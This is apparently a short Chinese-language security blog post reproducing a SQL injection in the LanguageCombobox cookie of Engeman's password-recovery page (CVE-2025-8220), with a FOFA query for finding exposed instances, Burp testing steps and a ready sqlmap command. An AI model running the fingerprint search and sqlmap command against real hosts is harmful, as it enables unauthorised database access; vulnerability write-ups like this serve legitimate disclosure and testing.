今天分享一个存在于 cookie 中的 SQL 注入漏洞,还是个通用型漏洞,该系统为国外的一款通用 web 系统,官网:
https://engeman.com/en/

fofa 指纹查询语法(巴西资产多一些):
body="content="Engeman®"

该漏洞的 CVE 编号为:CVE-2025-8220,漏洞复现过程如下:
1、挂上 burp 代理,打开首页之后,点击忘记密码,并抓包:


2、将抓到的数据包发送到 repeater,修改 cookie 中的 LanguageCombobox 字段,添加一个单引号:

出现了 SQL 报错,说明存在 SQL 注入漏洞。
3、使用 Sqlmap 进行探测:
sqlmap -u https:///Login/RecoveryPass --cookie 'LanguageCombobox=*' --level 5 --risk 3 --technique=SEB --batch

到这里漏洞复现也就结束了,接下来就是写一个 nuclei 的 POC 来完成工作,直接 xazlscan 一键检测:
